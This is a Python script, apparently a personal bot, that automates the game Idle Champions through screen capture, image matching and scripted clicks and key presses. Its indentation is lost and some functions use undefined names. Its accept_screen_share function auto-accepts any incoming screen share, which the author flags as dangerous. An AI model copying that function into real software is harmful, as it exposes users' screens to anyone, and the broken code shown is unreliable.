# Usually 376, 426, etc. and set restart on 386, 436, ...
CHARGE_TIME = 60.0 * 2.5
CHARGE_INTERVAL = 15.0
HAVI_ULT = '8'
APP_NAME = "Idle Champions"
RUNTIME_MINUTES = 20
GEM_LOOPS = 20000
DEFAULT_ADVENTURE = "madwizard"
DEFAULT_LEVEL_DELAY = 20
NUM_FAMILIARS = 6
MAX_TOTAL_IMAGE_MEAN = 35.0
MAX_IMAGE_MEAN = 10.0
# TODO: launch checklist
# [ ] Change run to no-modron, just charge briv at end of timer
# [ ] Create backup git on github with full history
# [ ] Squash history
# [ ] Make public
# TODO: things on my todo list
# [ ] Use flag for restart with Steam image vs. x,y (more stable?)
# [ ] Flag to pause on level 1 and allow Shandie's dash to reset
# [ ] Flag to do briv swapping at each zone complete (heavy duty and occupies entire time)
# [ ] Make champ flags work so don't need team in config file or can modify team in config file (for chores)
# [ ] Add more champs to the familiar leveling code
# [ ] Level Shandie and then wait for dash to trigger
COUNTDOWN = 5
DEFAULT_DELAY = 0.7
DEFAULT_DRAG = 0.1
LEVEL_TRYS=20
# Handle retinae vs standard displays by swapping prefixes
first_prefix = "./images/sml-"
second_prefix = "./images/"
# speed characters
have_briv = True
have_binwin = True
have_celeste = True
have_donaar = False
have_deekin = True
have_havilar = True
have_minsc = True
have_sentry = True
have_viper = False
have_shandie = True
have_melf = True
have_gold = True
bounty_size = "small"
verbose = False
debugging = False
MENU_BUTTON_WIDTH = 30
MENU_BUTTON_HEIGHT = 30
def verbose_print(msg):
global verbose
if verbose:
print(msg)
def debug_print(msg):
global debugging
if debugging:
print(msg)
def with_top_offset(off_x, off_y, as_point=False):
x, y = top_x + off_x, top_y + off_y
if as_point:
return pyautogui.Point(x, y)
return x, y
def menu_location():
# Point(x=113, y=147)
# return with_top_offset(0, 0)
return with_top_offset(32, 73)
def top_location_from_menu(x, y):
# menu top offset + middle of image
x, y = x - 32 - 9, y - 73 - 9
return x, y
def print_reverse_without_offset(x, y, as_point=False):
x = x - top_x
y = y - top_y
print("Offset from top_x, top_y: %d,%d", (x, y))
# Point(x=113, y=147)
# return with_top_offset(0, 0)
if as_point:
return pyautogui.Point(x, y)
return x, y
def move_to_menu():
x, y = menu_location()
pyautogui.moveTo(x,y)
def move_to_offset(x, y, duration=0.0):
x, y = with_top_offset(x, y)
pyautogui.moveTo(x,y, duration=duration)
def click_offset(x, y, duration=0.0, delay=None, tag=None):
move_to_offset(x, y, duration=duration)
pyautogui.click()
if tag:
verbose_print("%s: clicking on %d, %d" % (tag, x, y))
if delay:
time.sleep(delay)
def click_spec_at(x, y, duration=0.0, delay=DEFAULT_DELAY, tag=None):
# don't use this if modron_specialization is on
time.sleep(delay)
click_offset(x, y, duration=duration, delay=delay, tag=tag)
def region_for_screenshot(x, y, width, height):
x, y = with_top_offset(x, y)
return (screen_scale * x, screen_scale * y, screen_scale * width, screen_scale * height)
def location_for_screenshot(x,y):
return screen_scale * x, screen_scale * y
def safe_image_compare(im1, im2, save=False, max_mean=MAX_TOTAL_IMAGE_MEAN):
diff = ImageChops.difference(im1, im2)
stat = ImageStat.Stat(diff)
# im1.save("safe_im1.png")
# im2.save("safe_im2.png")
verbose_print("mean=%s" % str(stat.mean))
verbose_print("rms=%s" % str(stat.rms))
match = True
if (stat.mean[0] + stat.mean[1] + stat.mean[2]) > max_mean:
match = False
if stat.mean[0] > MAX_IMAGE_MEAN:
match = False
if stat.mean[1] > MAX_IMAGE_MEAN:
match = False
if stat.mean[2] > MAX_IMAGE_MEAN:
match = False
if save and not match:
im1.save("cmp-im1.png")
im2.save("cmp-im2.png")
diff.save("cmp-diff.png")
return match
# returns found, ready
# found is True if menu found at expected place
# ready is True if menu is not greyed out (e.g. no Okay button)
menu_blue_png = Image.open("images/menu_blue.png")
menu_blue = menu_blue_png.convert('RGB')
menu_blue2_png = Image.open("images/menu_blue.png")
menu_blue2 = menu_blue_png.convert('RGB')
menu_grey_png = Image.open("images/menu_grey.png")
menu_grey = menu_grey_png.convert('RGB')
def check_for_menu():
x, y = menu_location()
# pyautogui.moveTo(x, y, duration=0.1)
x, y = location_for_screenshot(x, y)
im1 = pyautogui.screenshot(region=(x, y, MENU_BUTTON_WIDTH, MENU_BUTTON_HEIGHT)).convert('RGB')
im1.save("testmenu.png")
# menu_blue.save("testblue.png")
if safe_image_compare(im1, menu_blue):
return True, True
if safe_image_compare(im1, menu_blue2):
return True, True
if safe_image_compare(im1, menu_grey):
return True, False
return False, False
def hunt_for_menu(level_images):
global top_x, top_y
pos = pyautogui.position()
verbose_print("pos=%s" % str(pos))
# x, y = location_for_screenshot(pos.x, pos.y)
verbose_print("x,y=%d,%d" % (pos.x, pos.y))
verbose_print("Configured top_x,top_y = %d,%d" % (top_x, top_y))
off_x, off_y = 20, 20
image_size = 30
region = (screen_scale * (pos.x - off_x), screen_scale * (pos.y - off_y),
screen_scale * (30+off_x), screen_scale * (30+off_y))
verbose_print("region=%s" % str(region))
im1 = pyautogui.screenshot(region=region)
if verbose:
im1.save("testmenu.png")
im1 = im1.convert('RGB')
found_x = 0
found_y = 0
for i in range(0,off_x*2):
for j in range(0,off_y*2):
im2 = im1.crop((i, j, i+30, j+30))
if safe_image_compare(im2, menu_blue):
if verbose:
im2.save("testfoundmenu.png")
verbose_print("found i,j=%d,%d" % (i, j))
# adjust for actual center of the image
x, y = (pos.x-off_x)*2 + i + image_size/2, (pos.y-off_y)*2 + j + image_size/2
verbose_print("center x,y=%f,%f" % (x, y))
x, y = x/screen_scale - 31 - 8, y/screen_scale - 75 - 5
x = int(x)
y = int(y)
verbose_print("Guess: x,y=%f,%f == top_x,top_y=%d,%d " % (x, y, top_x, top_y))
found_x = x
found_y = y
break
if found_x:
break
if not found_x:
return 0, 0, False
# Jitter
for x_jitter in range(-1, 2, 1):
for y_jitter in range(-1, 2, 1):
top_x = found_x + x_jitter
top_y = found_y + y_jitter
verbose_print("trying jitter %d,%d => %d,%d" % (x_jitter, y_jitter, top_x, top_y))
level, plus = get_current_zone(level_images=level_images, save=True, tries=1)
if level > 0:
print("Zone found %d (at start zone: %s), (on_boss: %s)" % (level, plus, on_boss()))
return top_x, top_y, True
return 0, 0, False
def activate_app(app_name, tries=2, reset_top=False):
for c in range(0,tries):
try:
window = gw.getWindowsWithTitle(app_name)[0]
window.activate()
time.sleep(0.2)
active = gw.getActiveWindow()
if active.title == app_name:
if reset_top:
global top_x, top_y, top_offset
top_x, top_y = active.left+1, active.top+top_offset
verbose_print("Updating top_x, top_y = %d,%d" % (top_x, top_y))
return active
if active.title == "":
# active menu is a pull down or some crap ... move to a neutral corner
pyautogui.moveTo(500,500)
verbose_print("window title: %s try again" % gw.getActiveWindow().title)
except gw.PyGetWindowException as a:
# print("%s not found, starting at %s" % (APP_NAME, datetime.datetime.now()))
verbose_print("WARNING: %s: %s" % (app_name, a, ))
except Exception as a:
# print("%s not found, starting at %s" % (APP_NAME, datetime.datetime.now()))
verbose_print("WARNING: %s: %s" % (app_name, a, ))
return False
# TODO: group/sort these according to target zone so we find zone quicker when at the end
def load_level_images():
images = {}
for f in glob.glob('levels/*.png'):
debug_print(f)
images[f] = Image.open(f).convert('RGB').crop((0, 0, 60, 56))
return images
OFFSET_xx1 = 1829
OFFSET_Y = 14
IMAGE_WIDTH = 60
IMAGE_HEIGHT = 56
# TODO: LEGACY set top_x and top_x by finding menu
def get_menu(tries=10, update=False):
for i in range(0,tries):
try:
# menu_home = locate('menu.png', region=(0,0,400,400))
menu_home = locate('menu_blue.png', 'menu_grey.png')
x = menu_home.x * 2 + 1829
y = menu_home.y * 2 + 14
return x, y
except Exception:
time.sleep(1)
# TODO: make this work
def verify_menu(tries=10, update=False):
menu_blue_nr = Image.open("menu_blue_nr.png")
verbose_print("Verifying menu ...")
for i in range(0,tries):
# First check using existing top_x, top_y (if exists)
if top_x != 0 or top_y != 0:
found, ready = check_for_menu()
verbose_print("Verifying menu found=%s,ready=%s" % (found, ready))
if found or ready:
return True
else:
# Image hunt!
try:
menu_home = locate('menu_blue.png', 'menu_grey.png')
# x, y = location_for_screenshot(x, y)
# x, y = menu_location()
#
# found ... all good!
if menu_home:
print("menu_home=%s x,y=%d,%d" % (menu_home, menu_home.x, menu_home.y))
verbose_print("Verifying menu: locateAll with Image")
positions = pyautogui.locateAllOnScreen(menu_blue_nr)
if positions:
for pos in positions:
print("locateAll: x,y=%d,%d" % (pos.left, pos.top))
verbose_print("Verifying menu: locateAll with filename")
positions = pyautogui.locateAllOnScreen("./menu_blue_nr.png")
if positions:
for pos in positions:
print("locateAll: x,y=%d,%d" % (pos.left, pos.top))
verbose_print("Verifying menu: locate with filename")
return True
except Exception as e:
print("image hunt %s" % e)
def get_level_region():
# grab first zone icon
region = region_for_screenshot(956, 90, 30, 28)
return (region[0]+1, region[1]-1, region[2], region[3])
boss = Image.open("levels/bosss.png").convert('RGB')
zone = Image.open("images/zone_complete.png").convert('RGB')
def on_boss(save_images=False, fast=True):
# grab boss icon, on boss if it is black
region = region_for_screenshot(1154, 93, 22, 22)
# boss
# x = x + 2219 - 1829
# y = y + 10 - 14
pause = pyautogui.PAUSE
if save_images:
pyautogui.FAILSAFE = False
pyautogui.PAUSE = 0.0
im1 = pyautogui.screenshot(region=region).convert('RGB')
if save_images:
im1.save("onboss.png")
boss.save("theboss.png")
diff = ImageChops.difference(im1, boss)
if save_images:
diff.save("bossdiff.png")
stat = ImageStat.Stat(diff)
pyautogui.PAUSE = pause
pyautogui.FAILSAFE = True
return safe_image_compare(im1, boss)
def zone_complete(save_images=False, fast=True):
# grab boss icon, on boss if it is black
region = region_for_screenshot(1154+75, 93-25, 5, 10)
# boss
# x = x + 2219 - 1829
# y = y + 10 - 14
pause = pyautogui.PAUSE
if fast:
pyautogui.FAILSAFE = False
pyautogui.PAUSE = 0.0
im1 = pyautogui.screenshot(region=region).convert('RGB')
if save_images:
im1.save("zonetest.png")
zone.save("zonefound.png")
diff = ImageChops.difference(im1, zone)
if save_images:
diff.save("diffdiff.png")
stat = ImageStat.Stat(diff)
if fast:
pyautogui.PAUSE = pause
pyautogui.FAILSAFE = True
if (stat.mean[0] + stat.mean[1] + stat.mean[2]) < MAX_IMAGE_MEAN:
return True
return False
# object to support finding images by index
class LevelFinder(object):
levels = []
images = {}
black = None
index = 0
def load_level_images(self):
self.levels = []
self.images = {}
for f in glob.glob('levels/*.png'):
debug_print(f)
key = f[7:][:-4]
if key == "bosss" or key == "boss":
continue
if key == "black":
self.black = Image.open(f).convert('RGB').crop((0, 0, 60, 56))
continue
self.images[key] = Image.open(f).convert('RGB').crop((0, 0, 60, 56))
self.levels.append(key)
self.total_images = len(self.levels)
self.levels.sort()
return self.images
def __init__(self):
self.index = 0
self.total_images = 0
self.load_level_images()
def get_current_zone(self, save=False, tries=LEVEL_TRYS):
im = None
for i in range(0, tries):
verbose_print("get_current_zone attempt %d" % i)
region = get_level_region()
raw_im = pyautogui.screenshot(region=region)
im = raw_im.convert('RGB')
# check if black first ...
diff = ImageChops.difference(im, self.black)
stat = ImageStat.Stat(diff)
if (stat.mean[0] + stat.mean[1] + stat.mean[2]) < MAX_IMAGE_MEAN:
time.sleep(.1)
continue
# start search at last index ...
for idx in range(0, self.total_images):
key = self.levels[(self.index + idx) % self.total_images]
img = self.images[key]
diff = ImageChops.difference(im, img)
stat = ImageStat.Stat(diff)
if (stat.mean[0] + stat.mean[1] + stat.mean[2]) < MAX_IMAGE_MEAN:
try:
level = int(key[:3])
plus = (key[-1:] != 's')
self.index = (self.index + idx) % self.total_images
if not plus:
self.index -= 1
# print("idx = %d" % idx)
return level, plus
except Exception:
break
if save:
im.save('my_screenshot%d.png' % i)
time.sleep(.1)
return -1, False
def get_current_zone(level_images, save=False, tries=LEVEL_TRYS):
im = None
for i in range(0,tries):
verbose_print("get_current_zone attempt %d" % i)
region = get_level_region()
raw_im = pyautogui.screenshot(region=region)
im = raw_im.convert('RGB')
for name, img in level_images.items():
diff = ImageChops.difference(im, img)
stat = ImageStat.Stat(diff)
if (stat.mean[0] + stat.mean[1] + stat.mean[2]) < 20.0:
match = name[7:10]
if match == "bla" or match == "bos":
break
try:
level = int(name[7:10])
plus = (name[10:11] != 's')
return level, plus
except Exception:
break
if save:
im.save('my_screenshot%d.png' % i)
time.sleep(.1)
return -1, False
def get_current_level(x, y, level_images, save=False):
im = None
for i in range(0,LEVEL_TRYS):
verbose_print("Current level attempt %d" % i)
im = pyautogui.screenshot(region=(x, y, 60, 56))
for name, img in level_images.items():
diff = ImageChops.difference(im.convert('RGB'), img)
stat = ImageStat.Stat(diff)
if (stat.mean[0] + stat.mean[1] + stat.mean[2]) < MAX_IMAGE_MEAN:
match = name[7:10]
if match == "bla" or match == "bos":
break
try:
level = int(name[7:10])
plus = (name[10:11] == 's')
return level, plus
except Exception:
break
if save:
im.save('my_screenshot%d.png' % i)
time.sleep(.1)
return -1, False
def query_yes_no(question, default="yes"):
"""Ask a yes/no question via raw_input() and return their answer.
"question" is a string that is presented to the user.
"default" is the presumed answer if the user just hits <Enter>.
It must be "yes" (the default), "no" or None (meaning
an answer is required of the user).
The "answer" return value is True for "yes" or False for "no".
"""
valid = {"yes": True, "y": True, "ye": True,
"no": False, "n": False}
if default is None:
prompt = " [y/n] "
elif default == "yes":
prompt = " [Y/n] "
elif default == "no":
prompt = " [y/N] "
else:
raise ValueError("invalid default answer: '%s'" % default)
while True:
sys.stdout.write(question + prompt)
choice = input().lower()
if default is not None and choice == '':
return valid[default]
elif choice in valid:
return valid[choice]
else:
sys.stdout.write("Please respond with 'yes' or 'no' "
"(or 'y' or 'n').\n")
def load_player_json():
user_file = os.path.join(Path.home(),
"Library/Application Support/Steam/steamapps/common/IdleChampions",
"IdleDragonsMac.app/Contents/Resources/Data/StreamingAssets",
"downloaded_files/webRequestLog.txt")
player_info = []
with open(user_file, "r") as f:
for line in f:
if "current_area" in line:
info = json.loads(line)
player_info.append(info)
return player_info
# repair a broken desktop shortcut
def repair_shortcut():
# short cut destination
idle_path = os.path.join(Path.home(), config.get("idler", "steam_app_path"))
if not os.path.isdir(idle_path):
print("ERROR: app path is incorrect: %s", idle_path)
print("ERROR: check that Idle Champions is installed")
return False
short_cut = os.path.join(Path.home(), config.get("idler", "shortcut_path"))
if not os.path.isdir(short_cut):
print("ERROR: short cut path is missing: %s", short_cut)
print("ERROR: create the Idle Champions shortcut in Steam")
return False
# cp .icns file
icns_source = os.path.join(idle_path, config.get("idler", "steam_icns"))
icns_dest = os.path.join(short_cut, config.get("idler", "shortcut_icns"))
verbose_print("copying %s to %s" % (icns_source, icns_dest))
shutil.copy(icns_source, icns_dest)
# cp info.plst
info_source = "./documentation/Info.plist"
info_dest = os.path.join(short_cut, "Contents/Info.plist")
verbose_print("copying %s to %s" % (info_source, info_dest))
shutil.copy(info_source, info_dest)
def dump_stats(args, player_stats):
# print(json.dumps(player_stats[0], indent=4, sort_keys=True))
# return
bs_tiny = 0
bs_small = 0
bs_medium = 0
bs_large = 0
bc_tiny = 0
bc_small = 0
bc_medium = 0
bc_large = 0
# check which line it is in:
buffs = None
for stat_block in player_stats:
if "details" in stat_block:
buffs = stat_block["details"]["buffs"]
break
for buff in buffs:
if not "buff_id" in buff:
continue
buff_id = buff["buff_id"]
if buff_id == "31":
bs_tiny = int(buff["inventory_amount"])
elif buff_id == "32":
bs_small = int(buff["inventory_amount"])
elif buff_id == "33":
bs_medium = int(buff["inventory_amount"])
elif buff_id == "34":
bs_large = int(buff["inventory_amount"])
elif buff_id == "17":
bc_tiny = int(buff["inventory_amount"])
elif buff_id == "18":
bc_small = int(buff["inventory_amount"])
elif buff_id == "19":
bc_medium = int(buff["inventory_amount"])
elif buff_id == "20":
bc_large = int(buff["inventory_amount"])
ilvls = bs_tiny * 1 + bs_small*2 + bs_medium * 6 + bs_large * 24
print("Blacksmith Contracts: %d ilvls" % ilvls)
print(" tiny=%d x 1 + small=%d x 2 + medium=%d x 6 + large=%d x 24 = %d ilvls" % (
bs_tiny, bs_small, bs_medium, bs_large, ilvls,
))
tokens = bc_tiny*12 + bc_small*72 + bc_medium * 576 + bc_large * 1152
runs = tokens / 2500
print("Bounty Contracts: %d tokens (%d free play runs)" % (tokens, runs))
print(" tiny=%d x 12 + small=%d x 72 + medium=%d x 576 + large=%d x 1152 = %d tokens (%d runs)" % (
bc_tiny, bc_small, bc_medium, bc_large, tokens, runs
))
# Dangerous, you will accept screenshare from whomever asks ...
# TODO: Need to add an image check for person intended.
def accept_screen_share(is_on):
if not is_on:
return
pyautogui.moveTo(1400, 50, duration=0.0)
pyautogui.click()
time.sleep(1.0)
pyautogui.moveTo(924, 300, duration=0.0)
pyautogui.click()
def locate(png_name, png_name2=None, click_image_index=0, search_region=None, can_swap=True, screen_shot=None):
verbose_print("locating %s" % str(png_name))
global first_prefix, second_prefix
if not screen_shot:
screen_shot = pyautogui.screenshot(region=search_region)
screen_shot.save("test"+png_name)
if search_region:
x_off = search_region[0]
y_off = search_region[1]
try:
if click_image_index > 0:
positions = pyautogui.locateAll(first_prefix+png_name,
screen_shot,
greyscale=0.9,
)
positions = list(positions)
box = positions[click_image_index]
by2 = pyautogui.Point((x_off+box.left+(box.width/2)) / 2, (y_off+box.top+(box.height/2)) / 2)
else:
box = pyautogui.locate(first_prefix+png_name,
screen_shot,
grayscale=True,
)
by2 = pyautogui.Point((x_off+box.left+(box.width/2)) / 2, (y_off+box.top+(box.height/2)) / 2)
verbose_print("locate(%s) = %s" % (png_name, str(by2)))
return by2
except Exception as e:
verbose_print("locate(%s) = %s" % (png_name, str(e)))
pass
# only recurse once per image ...
if not can_swap:
if png_name2:
return locate(png_name2,
click_image_index=click_image_index,
search_region=search_region,
can_swap=True,
screen_shot=screen_shot)
return None
# swap so we find the right resolution faster next time (won't swap if second also raises)
verbose_print("swapping from %s to %s" % (first_prefix, second_prefix))
t = first_prefix
first_prefix = second_prefix
second_prefix = t
return locate(png_name,
png_name2=png_name2,
click_image_index=click_image_index,
search_region=search_region,
can_swap=False, screen_shot=screen_shot)
def drag_image(png_name, delta_x, delta_y, duration=DEFAULT_DRAG, delay=DEFAULT_DELAY):
start = locate(png_name)
pyautogui.moveTo(start.x, start.y)
pyautogui.mouseDown(x=start.x, y=start.y, button=pyautogui.LEFT)
pyautogui.dragRel(delta_x, delta_y, duration=duration, button=pyautogui.LEFT, mouseDownUp=False)
pyautogui.mouseUp(button=pyautogui.LEFT)
time.sleep(delay)
verbose_print("Location: %s" % str(start))
# print("%s" % str(button)
# pyautogui.click(button, clicks=2)
return "Dragged {0}".format(png_name)
def goto_image(png_name, png_name2=None, delay=0.5):
return click_image(png_name, png_name2=png_name2, delay=delay, click=False)
def click_image(png_name, png_name2=None, delay=0.5, click=True, click_image_index=0):
global verbose
button = None
try:
button = locate(png_name, click_image_index=click_image_index)
except Exception:
if png_name2:
try:
button = locate(png_name2, click_image_index=click_image_index)
except Exception:
pass
if not button:
return ""
if verbose:
print("Location: %s" % str(button))
pyautogui.moveTo(button.x, button.y)
time.sleep(delay)
if not click:
return "Moved"
pyautogui.click()
time.sleep(delay)
# print("%s" % str(button))
# pyautogui.click(button, clicks=2)
return "Clicked {0}".format(png_name)
def check_crashed_app():
try:
window = gw.getWindowsWithTitle("Problem Report for Idle Champions")[0]
except Exception:
window = None
if not window:
return False
print("Detected Crash!")
# window.activate()
window.close()
# click [OK]
click_ok()
startup_idle_champions()
def shutdown_app(keyboard=True):
if keyboard:
verbose_print("Shutdown Idle Champions with CMD-Q")
try:
app = activate_app(APP_NAME)
if app:
debug_print("App for CMD-q %s" % app.title)
debug_print("Sending CMD-q")
pyautogui.hotkey('command', 'q', interval=0.1)
# pyautogui.keyDown('command')
# pyautogui.press('q')
# pyautogui.keyUp('command')
return
except Exception as e:
pass
verbose_print("Shutdown Idle Champions with close")
try:
windows = gw.getWindowsWithTitle(APP_NAME)
for window in windows:
if window.title == APP_NAME:
window.close()
time.sleep(20.0)
return
print("Warning: shutdown: '%s' not an exact match for '%s'" % (window.title, APP_name))
raise gw.PyGetWindowException("No exact match for 'Idle Champions'")
except Exception as e:
raise gw.PyGetWindowException("ERROR: shutdown: '%s'" % e)
# Startup using Steam App
# Warning: will shutdown app if running!
def startup_idle_champions(tries=5):
# TODO: loop on this block until we find menu.png if not using preset top_x, top_y
# Bring up steam
print("Restarting Idle Champions")
for attempt in range(0,tries):
if config.getboolean("idler", "shortcut_restarting"):
verbose_print("Starting app with shortcut")
try:
short_cut = os.path.join(Path.home(), config.get("idler", "shortcut_path"))
if not os.path.exists(short_cut):
print("ERROR: create a %s desktop short cut using Steam" % short_cut)
sys.exit(1)
result = os.system("open '%s'" % short_cut)
verbose_print("open shortcut_path (%s) returns %s" % (short_cut, str(result)))
except Exception as e:
print("ERROR: could not launch %s" % short_cut)
print("ERROR: %s" % str(e))
sys.exit(1)
elif config.getboolean("idler", "shortcut_start_xy"):
# TODO: fall back to click_image if this fails
x = config.getint("steam", "start_x")
y = config.getint("steam", "start_y")
pyautogui.moveTo(x, y)
time.sleep(0.1)
pyautogui.click()
time.sleep(1.0)
else:
verbose_print("Looking for the steam app")
# move mouse to top corner
steam = activate_app("Steam")
# click [Play] or [Stop]
verbose_print("Clicking Play/Stop")
# NOTE: start_with_image is more finicky that start with x,y
if config.getboolean("steam", "start_with_image"):
click_image("steam_play.png")
# now restore the app to front
print("Waiting for Idle to launch.")
found_app = False
ignore_errors = 20
for s in range(40, 0, -1):
verbose_print(" %d seconds" % (s/2))
time.sleep(0.5)
# bring to front
try:
windows = gw.getWindowsWithTitle(APP_NAME)
for window in windows:
if window.title == APP_NAME:
found_app = activate_app(APP_NAME, reset_top=True)
raise gw.PyGetWindowException("No exact match for 'Idle Champions'")
except gw.PyGetWindowException as a:
if s <= ignore_errors:
print("Not found yet: %s: %s" % (datetime.datetime.now(), a))
else:
verbose_print("Not found yet: %s: %s" % (datetime.datetime.now(), a))
except Exception as a:
if s <= ignore_errors:
print("Not found yet: %s: %s" % (datetime.datetime.now(), a))
else:
verbose_print("Not found yet: %s: %s" % (datetime.datetime.now(), a))
if found_app:
break
# click ok or find menu for 20 seconds
if click_ok(startup=True, count=20, ic_app=found_app):
return True
# Try killing the app and trying again
shutdown_app(True)
return False
def click_ok(count=1, startup=False, ic_app=None):
# Look for an OK button
found_ok = False
move = 50
# loop attempting a "smart" startup using remembered or hinted top_x, top_y
known_okays = [(635, 505), (635, 475), (635, 565), (750, 370)]
ready = False
found_menu = False
for s in range(count, 0, -1):
if ready:
return True
# start by clicking on known OK locations to skip movies/okay seeking
verbose_print(" Madly clicking on possible okay locations")
for pair in known_okays:
x, y = with_top_offset(pair[0], pair[1])
pyautogui.moveTo(x, y, 0.1)
pyautogui.click(x, y)
time.sleep(0.1)
# TODO: set top x, y if not using location hints
# check for greyed our AND normal menu button, greyed out find okay, normal we're done!
verbose_print(" Checking for menu button")
found, ready = check_for_menu()
if ready:
return True
if found_menu:
# second check, now need to manually hunt for Okay button
break
found_menu = found
if count != 0:
try:
if gw.getActiveWindow().title != APP_NAME:
raise Exception("wrong window")
except Exception as e:
ic_app = activate_app(APP_NAME)
time.sleep(0.5)
time.sleep(0.5)
return False
# give up on fast method, now go looking for okay image and reset top_x, top_y using menu image
for s in range(count, 0, -1):
try:
found_level, plus = get_current_level(x, y, level_images, False)
if found_level > 0:
print(" Found %d level." % found_level)
return x,y
except Exception:
pass
if count > 0:
time.sleep(1.0)
try:
x1, y1 = get_menu(1)
# found! we can just leave now
return x1, y1
except Exception:
pass
if not found_ok:
try:
found_ok = click_image("okay.png")
if found_ok:
time.sleep(2)
print(" Found okay button.")
except Exception:
pass
pyautogui.moveRel(0, move)
move = -move
time.sleep(.8)
def foreground_or_start(tries=2):
# windows = gw.getAllTitles()
# print("%s" % windows)
activated = activate_app(APP_NAME, tries=tries, reset_top=True)
if not activated:
startup_idle_champions()
# Don't have top_x, top_y set? Figure it out!
if top_x == 0 and top_y == 0:
verify_menu()
# im1 = pyautogui.screenshot()
# im1.save('my_screenshot.png')
# window = pyautogui.getWindowsWithTitle("Idle Champions")
# print("window=%s" % str(window))
# Bring app to foreground
# try:
# click_image('dockicon.png')
# except Exception:
# print("can't find dock icon")
def wrap_it_up():
# Wait for animation before Continue ...
foreground_or_start()
time.sleep(0.5)
pyautogui.press("r")
time.sleep(0.9)
click_offset(559, 491, duration=0.1, delay=0.1, tag="Click Complete")
for i in range(0,30):
# Click Skip like Crazy for a bit
click_offset(1158, 650, duration=0.1, delay=0.1, tag="Click Skip")
time.sleep(0.1)
click_offset(635, 595, duration=0.1, delay=0.1, tag="Click Continue")
time.sleep(5.5)
def wrap_it_up2(position):
# Wait for animation before Continue ...
attempt = 0
complete = ""
skipped = False
while attempt < 40:
print("attempt %s" % attempt)
if not complete:
foreground_or_start()
time.sleep(0.5)
pyautogui.press("r")
time.sleep(0.5)
complete = click_image('complete.png', 'complete2.png')
if complete:
print("Completed Adventure")
if complete and not skipped:
print("Skipping")
# position = locate('menu.png')
for _ in range(0, 16):
menu_offset_click(position, 430, 120)
skipped = True
result = click_image('continue.png')
if result:
print("Viewed Adventure Stats")
break
time.sleep(0.5)
attempt += 1
time.sleep(1.5)
def start_it_up(adventure):
# Start mad wizard (one should work)
# Click on city
click_offset(324, 682, duration=0.1, delay=0.1, tag="Launch Adventure Picker")
foreground_or_start()
time.sleep(0.5)
if adventure == DEFAULT_ADVENTURE:
click_offset(366, 160, duration=0.1, delay=0.1, tag="Launch Mad Wizard")
else:
click_offset(366, 220, duration=0.1, delay=0.1, tag="Launch Terror")
# time to settle (and for initial hit)
time.sleep(0.5)
click_offset(801, 558, duration=0.1, delay=0.1, tag="Click Start Objective")
def menu_offset(pos, x, y):
x = pos.x + 1380 / 2 + x
y = pos.y + 895 / 2 + y
return pyautogui.Point(x,y)
def menu_offset_click(pos, x, y):
x = pos.x + 1380 / 2 + x
y = pos.y + 895 / 2 + y
pyautogui.click(x, y)
time.sleep(0.2)
def menu_offset_move(pos, x, y):
x = pos.x + 1380 / 2 + x
y = pos.y + 895 / 2 + y
pyautogui.moveTo(x, y, 2.0)
time.sleep(0.2)
def place_click_familiars(num_familiars):
pyautogui.keyDown("f")
click_offset(180, 695, duration=0.1, delay=0.1, tag="Click Damage Leveler")
click_offset(933, 240, duration=0.1, delay=0.1, tag="1st Battlefield Clicker")
if num_familiars < 4:
return
click_offset(869, 325, duration=0.1, delay=0.1, tag="2nd Battlefield Clicker")
click_offset(1000, 325, duration=0.1, delay=0.1, tag="3rd Battlefield Clicker")
if num_familiars < 6:
return
click_offset(869, 391, duration=0.1, delay=0.1, tag="5th Battlefield Clicker")
click_offset(1000, 391, duration=0.1, delay=0.1, tag="6th Battlefield Clicker")
pyautogui.keyUp("f")
def restart_stacking(args):
charge_time = args.charge
shutdown_app(args.keyboard_shutdown)
time.sleep(charge_time)
startup_idle_champions()
def charge_briv(level, plus, images, args):
screenshare = args.screenshare
charge_time = args.charge
briv_target = args.target - args.briv_recharge_areas
restart = args.restart
print("Recharging Briv starting at %s" % (datetime.datetime.now()))
GO_BACK_DELAY=2.0
pyautogui.press("g")
time.sleep(0.5)
pyautogui.press("w")
# time to settle
time.sleep(2.0)
# restart charging ... so good
if restart:
if on_boss():
verbose_print(" %d & boss; go back one" % level)
pyautogui.press("left")
time.sleep(GO_BACK_DELAY)
shutdown_app(args.keyboard_shutdown)
accept_screen_share(screenshare)
time.sleep(charge_time)
startup_idle_champions()
time.sleep(5.0)
# manual charging ... still better than a poke in the eye with a sharp stick
else:
# make sure we are not on a boss or zone without a spinner
while True:
verbose_print("charge_briv %d %s" % (level, plus))
if on_boss():
verbose_print(" %d & boss; go back one" % level)
pyautogui.press("left")
time.sleep(GO_BACK_DELAY)
break
elif level == briv_target:
verbose_print(" Just go for it %d" % level)
break
pyautogui.press("left")
time.sleep(GO_BACK_DELAY)
try:
level, plus = get_current_level(x, y, level_images, False)
except Exception:
break
elif level == briv_target + 6 and plus:
pyautogui.press("left")
time.sleep(GO_BACK_DELAY)
pyautogui.press("left")
time.sleep(GO_BACK_DELAY)
break
else:
verbose_print(" Done")
break
charging = charge_time
while charging > 0.0:
verbose_print("Charging Briv: %f more seconds" % (charging))
if charging > CHARGE_INTERVAL:
accept_screen_share(screenshare)
foreground_or_start()
if on_boss():
print("%d & boss; go back one" % level)
pyautogui.press("left")
time.sleep(CHARGE_INTERVAL)
charging -= CHARGE_INTERVAL
else:
time.sleep(charging)
break
# start going forward again ... why is this sooooooo slow
print("Resuming ...")
foreground_or_start()
pyautogui.press("left")
time.sleep(1.5)
pyautogui.press("q")
time.sleep(0.25)
pyautogui.press("g")
time.sleep(0.25)
pyautogui.press("q")
return True
def remove_familiars(position, ult):
pyautogui.keyDown("f")
time.sleep(0.1)
offset = 230
if ult == 4:
offset += 90
if ult == 5:
offset += 120
menu_offset_click(position, offset, 10)
menu_offset_click(position, offset, 10)
pyautogui.keyUp("f")
pass
def place_other_familiars(position, familiars):
pyautogui.keyDown("f")
# place more click familiars
# drag_image('familiar.png', 135, -135)
if familiars >= 3:
menu_offset_click(position, 135, -195)
# drag_image('familiar.png', 275, -135)
if familiars >= 4:
menu_offset_click(position, 275, -195)
# drag_image('familiar.png', 135, -195)
if familiars >= 5:
menu_offset_click(position, 135, -135)
# drag_image('familiar.png', 275, -195)
if familiars >= 6:
menu_offset_click(position, 275, -135)
# drag_image('familiar.png', 195, -255)
if familiars >= 7:
menu_offset_click(position, 195, -255)
pyautogui.keyUp("f")
return
# binwin (slot 3)
# drag_image('familiar.png', -225, 165)
menu_offset_click(position, -225, 165)
if familiars <= 8:
return
# Shandie (slot 7)
drag_image('familiar.png', 100, 165)
if familiars <= 9:
return
